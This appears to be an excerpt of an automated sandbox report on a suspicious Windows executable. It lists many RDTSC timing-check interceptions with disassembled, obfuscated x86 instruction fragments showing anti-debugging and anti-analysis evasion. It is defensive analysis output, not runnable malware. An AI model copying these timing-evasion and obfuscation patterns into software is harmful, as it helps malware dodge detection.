              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6E2AE5 second address: 6E2AF6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCD7D2AFB0Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6E2AF6 second address: 6E2AFB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6E761C second address: 6E7621 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6E7621 second address: 6E762B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FCD7C4F0D96h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6E762B second address: 6E762F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6E93D1 second address: 6E93D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6E93D6 second address: 6E93E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FCD7D2AFB06h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6EA527 second address: 6EA5A7 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FCD7C4F0D96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b mov dword ptr [esp], eax 0x0000000e sub dword ptr [ebp+122D2593h], ebx 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push edx 0x00000019 call 00007FCD7C4F0D98h 0x0000001e pop edx 0x0000001f mov dword ptr [esp+04h], edx 0x00000023 add dword ptr [esp+04h], 0000001Ch 0x0000002b inc edx 0x0000002c push edx 0x0000002d ret 0x0000002e pop edx 0x0000002f ret 0x00000030 movsx edi, si 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push ebp 0x00000038 call 00007FCD7C4F0D98h 0x0000003d pop ebp 0x0000003e mov dword ptr [esp+04h], ebp 0x00000042 add dword ptr [esp+04h], 00000016h 0x0000004a inc ebp 0x0000004b push ebp 0x0000004c ret 0x0000004d pop ebp 0x0000004e ret 0x0000004f mov bl, EEh 0x00000051 mov dword ptr [ebp+122D336Dh], edx 0x00000057 push eax 0x00000058 pushad 0x00000059 jp 00007FCD7C4F0DA6h 0x0000005f pushad 0x00000060 push eax 0x00000061 push edx 0x00000062 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6E955B second address: 6E9560 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6EB4BA second address: 6EB4BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6EB4BF second address: 6EB4CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007FCD7D2AFB06h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6E9649 second address: 6E964F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6EA695 second address: 6EA699 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6EA699 second address: 6EA6B2 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FCD7C4F0D96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FCD7C4F0D9Dh 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6ED496 second address: 6ED50B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push eax 0x00000008 jnc 00007FCD7D2AFB0Ch 0x0000000e pop eax 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push edx 0x00000013 call 00007FCD7D2AFB08h 0x00000018 pop edx 0x00000019 mov dword ptr [esp+04h], edx 0x0000001d add dword ptr [esp+04h], 00000017h 0x00000025 inc edx 0x00000026 push edx 0x00000027 ret 0x00000028 pop edx 0x00000029 ret 0x0000002a mov edi, dword ptr [ebp+122D340Fh] 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push eax 0x00000035 call 00007FCD7D2AFB08h 0x0000003a pop eax 0x0000003b mov dword ptr [esp+04h], eax 0x0000003f add dword ptr [esp+04h], 0000001Ch 0x00000047 inc eax 0x00000048 push eax 0x00000049 ret 0x0000004a pop eax 0x0000004b ret 0x0000004c push 00000000h 0x0000004e jp 00007FCD7D2AFB0Ch 0x00000054 mov dword ptr [ebp+12445A6Ah], esi 0x0000005a cld 0x0000005b xchg eax, esi 0x0000005c push esi 0x0000005d pushad 0x0000005e push eax 0x0000005f push edx 0x00000060 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6ED50B second address: 6ED511 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6EB650 second address: 6EB656 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6EB656 second address: 6EB65C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6EB65C second address: 6EB660 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6EB660 second address: 6EB664 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6ED66E second address: 6ED67E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 js 00007FCD7D2AFB0Eh 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6ED67E second address: 6ED70F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 nop 0x00000006 pushad 0x00000007 mov ecx, dword ptr [ebp+122D3277h] 0x0000000d add dword ptr [ebp+122D1B05h], edi 0x00000013 popad 0x00000014 push dword ptr fs:[00000000h] 0x0000001b push 00000000h 0x0000001d push eax 0x0000001e call 00007FCD7C4F0D98h 0x00000023 pop eax 0x00000024 mov dword ptr [esp+04h], eax 0x00000028 add dword ptr [esp+04h], 00000018h 0x00000030 inc eax 0x00000031 push eax 0x00000032 ret 0x00000033 pop eax 0x00000034 ret 0x00000035 mov edi, 24EF1581h 0x0000003a mov ebx, ecx 0x0000003c mov dword ptr fs:[00000000h], esp 0x00000043 pushad 0x00000044 jmp 00007FCD7C4F0DA4h 0x00000049 mov dword ptr [ebp+122D2031h], esi 0x0000004f popad 0x00000050 mov eax, dword ptr [ebp+122D0489h] 0x00000056 jo 00007FCD7C4F0DA7h 0x0000005c jmp 00007FCD7C4F0DA1h 0x00000061 push FFFFFFFFh 0x00000063 mov ebx, dword ptr [ebp+122D3520h] 0x00000069 nop 0x0000006a push eax 0x0000006b push edx 0x0000006c push eax 0x0000006d push edx 0x0000006e push ebx 0x0000006f pop ebx 0x00000070 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6ED70F second address: 6ED719 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FCD7D2AFB06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6F0562 second address: 6F05EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push eax 0x0000000c call 00007FCD7C4F0D98h 0x00000011 pop eax 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 add dword ptr [esp+04h], 00000015h 0x0000001e inc eax 0x0000001f push eax 0x00000020 ret 0x00000021 pop eax 0x00000022 ret 0x00000023 push 00000000h 0x00000025 push 00000000h 0x00000027 push esi 0x00000028 call 00007FCD7C4F0D98h 0x0000002d pop esi 0x0000002e mov dword ptr [esp+04h], esi 0x00000032 add dword ptr [esp+04h], 00000018h 0x0000003a inc esi 0x0000003b push esi 0x0000003c ret 0x0000003d pop esi 0x0000003e ret 0x0000003f push 00000000h 0x00000041 push 00000000h 0x00000043 push ecx 0x00000044 call 00007FCD7C4F0D98h 0x00000049 pop ecx 0x0000004a mov dword ptr [esp+04h], ecx 0x0000004e add dword ptr [esp+04h], 00000017h 0x00000056 inc ecx 0x00000057 push ecx 0x00000058 ret 0x00000059 pop ecx 0x0000005a ret 0x0000005b mov edi, dword ptr [ebp+122D342Dh] 0x00000061 push eax 0x00000062 push eax 0x00000063 push edx 0x00000064 jmp 00007FCD7C4F0DA8h 0x00000069 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6F1471 second address: 6F14DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCD7D2AFB19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d mov edi, dword ptr [ebp+1244823Dh] 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push esi 0x00000018 call 00007FCD7D2AFB08h 0x0000001d pop esi 0x0000001e mov dword ptr [esp+04h], esi 0x00000022 add dword ptr [esp+04h], 0000001Ch 0x0000002a inc esi 0x0000002b push esi 0x0000002c ret 0x0000002d pop esi 0x0000002e ret 0x0000002f mov dword ptr [ebp+122D336Dh], ecx 0x00000035 mov edi, dword ptr [ebp+122D3069h] 0x0000003b mov edi, dword ptr [ebp+1244823Dh] 0x00000041 push 00000000h 0x00000043 adc di, 47F3h 0x00000048 push eax 0x00000049 pushad 0x0000004a pushad 0x0000004b push eax 0x0000004c push edx 0x0000004d rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6F14DC second address: 6F14E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6F476E second address: 6F47B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCD7D2AFB0Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007FCD7D2AFB1Fh 0x0000000f jmp 00007FCD7D2AFB19h 0x00000014 popad 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FCD7D2AFB0Ch 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6F47B1 second address: 6F47B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6F0780 second address: 6F078D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jg 00007FCD7D2AFB06h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6F47B7 second address: 6F47BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6F47BD second address: 6F47C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6EE614 second address: 6EE6BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCD7C4F0D9Ch 0x00000009 popad 0x0000000a push eax 0x0000000b jmp 00007FCD7C4F0DA7h 0x00000010 nop 0x00000011 mov ebx, dword ptr [ebp+122D357Ch] 0x00000017 push dword ptr fs:[00000000h] 0x0000001e push 00000000h 0x00000020 push ecx 0x00000021 call 00007FCD7C4F0D98h 0x00000026 pop ecx 0x00000027 mov dword ptr [esp+04h], ecx 0x0000002b add dword ptr [esp+04h], 00000016h 0x00000033 inc ecx 0x00000034 push ecx 0x00000035 ret 0x00000036 pop ecx 0x00000037 ret 0x00000038 mov dword ptr fs:[00000000h], esp 0x0000003f mov dword ptr [ebp+122D1C3Eh], esi 0x00000045 mov eax, dword ptr [ebp+122D1175h] 0x0000004b push 00000000h 0x0000004d push ecx 0x0000004e call 00007FCD7C4F0D98h 0x00000053 pop ecx 0x00000054 mov dword ptr [esp+04h], ecx 0x00000058 add dword ptr [esp+04h], 00000018h 0x00000060 inc ecx 0x00000061 push ecx 0x00000062 ret 0x00000063 pop ecx 0x00000064 ret 0x00000065 jno 00007FCD7C4F0D9Ch 0x0000006b push FFFFFFFFh 0x0000006d movsx ebx, dx 0x00000070 push eax 0x00000071 pushad 0x00000072 jnp 00007FCD7C4F0D9Ch 0x00000078 push eax 0x00000079 push edx 0x0000007a pushad 0x0000007b popad 0x0000007c rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6F5653 second address: 6F5665 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCD7D2AFB0Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6F5665 second address: 6F566F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FCD7C4F0D96h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6F566F second address: 6F56B2 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FCD7D2AFB06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push edx 0x00000014 call 00007FCD7D2AFB08h 0x00000019 pop edx 0x0000001a mov dword ptr [esp+04h], edx 0x0000001e add dword ptr [esp+04h], 00000018h 0x00000026 inc edx 0x00000027 push edx 0x00000028 ret 0x00000029 pop edx 0x0000002a ret 0x0000002b mov ebx, dword ptr [ebp+122D3544h] 0x00000031 push 00000000h 0x00000033 mov ebx, 4540E079h 0x00000038 push eax 0x00000039 pushad 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6F4952 second address: 6F49D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop esi 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push esi 0x0000000e call 00007FCD7C4F0D98h 0x00000013 pop esi 0x00000014 mov dword ptr [esp+04h], esi 0x00000018 add dword ptr [esp+04h], 00000014h 0x00000020 inc esi 0x00000021 push esi 0x00000022 ret 0x00000023 pop esi 0x00000024 ret 0x00000025 mov ebx, dword ptr [ebp+122D34C8h] 0x0000002b push dword ptr fs:[00000000h] 0x00000032 mov ebx, dword ptr [ebp+1244827Eh] 0x00000038 mov dword ptr fs:[00000000h], esp 0x0000003f mov edi, dword ptr [ebp+122D33C5h] 0x00000045 mov eax, dword ptr [ebp+122D0139h] 0x0000004b push 00000000h 0x0000004d push eax 0x0000004e call 00007FCD7C4F0D98h 0x00000053 pop eax 0x00000054 mov dword ptr [esp+04h], eax 0x00000058 add dword ptr [esp+04h], 00000015h 0x00000060 inc eax 0x00000061 push eax 0x00000062 ret 0x00000063 pop eax 0x00000064 ret 0x00000065 sbb bx, E267h 0x0000006a push FFFFFFFFh 0x0000006c mov dword ptr [ebp+124631BBh], edx 0x00000072 push eax 0x00000073 push eax 0x00000074 push edx 0x00000075 pushad 0x00000076 jg 00007FCD7C4F0D96h 0x0000007c pushad 0x0000007d popad 0x0000007e popad 0x0000007f rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6F49D6 second address: 6F49DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6F49DC second address: 6F49E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6FC183 second address: 6FC188 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6FC2F0 second address: 6FC2F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 704108 second address: 70410E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 70410E second address: 704132 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jns 00007FCD7C4F0D9Ch 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FCD7C4F0DA0h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6A08E8 second address: 6A090A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCD7D2AFB0Dh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FCD7D2AFB0Bh 0x00000011 push edx 0x00000012 pop edx 0x00000013 pop eax 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 70A25A second address: 70A26F instructions: 0x00000000 rdtsc 0x00000002 jg 00007FCD7C4F0D9Eh 0x00000008 jc 00007FCD7C4F0D96h 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push esi 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 70A26F second address: 70A27A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push ecx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 70A27A second address: 70A29F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCD7C4F0DA7h 0x00000009 pushad 0x0000000a popad 0x0000000b push edi 0x0000000c pop edi 0x0000000d popad 0x0000000e pushad 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 70A58D second address: 70A5B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 jmp 00007FCD7D2AFB16h 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e popad 0x0000000f pop eax 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 70A5B7 second address: 70A5BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 70A5BB second address: 70A5BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 70A5BF second address: 70A5C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 70A5C5 second address: 70A5DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCD7D2AFB16h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 70A72E second address: 70A73E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCD7C4F0D9Ch 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 70A73E second address: 70A744 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 70A744 second address: 70A750 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 70F409 second address: 70F427 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCD7D2AFB17h 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 70E270 second address: 70E283 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jne 00007FCD7C4F0D96h 0x0000000d jne 00007FCD7C4F0D96h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 70E283 second address: 70E296 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FCD7D2AFB0Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6E3408 second address: 6E3437 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 sbb ch, 0000004Ah 0x0000000c lea eax, dword ptr [ebp+1247F15Bh] 0x00000012 nop 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FCD7C4F0DA8h 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6E3437 second address: 6E343B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6E343B second address: 6E3441 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6E3441 second address: 6C0749 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FCD7D2AFB0Dh 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e ja 00007FCD7D2AFB12h 0x00000014 ja 00007FCD7D2AFB0Ch 0x0000001a jng 00007FCD7D2AFB06h 0x00000020 nop 0x00000021 sub edi, 79B88C04h 0x00000027 call dword ptr [ebp+122D33D0h] 0x0000002d push eax 0x0000002e push edx 0x0000002f push edx 0x00000030 jng 00007FCD7D2AFB06h 0x00000036 pop edx 0x00000037 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6E35EE second address: 6E35F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6E35F4 second address: 6E35F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6E3890 second address: 6E3896 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6E3A3C second address: 6E3A40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6E3A40 second address: 6E3A60 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FCD7C4F0DA3h 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 pop edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6E3E69 second address: 6E3EC5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCD7D2AFB14h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007FCD7D2AFB08h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 0000001Ch 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 mov ecx, dword ptr [ebp+122D3548h] 0x0000002c js 00007FCD7D2AFB0Ah 0x00000032 mov dx, 1F41h 0x00000036 push 00000004h 0x00000038 xor dword ptr [ebp+122D1BEFh], esi 0x0000003e nop 0x0000003f pushad 0x00000040 pushad 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6E3EC5 second address: 6E3ECB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
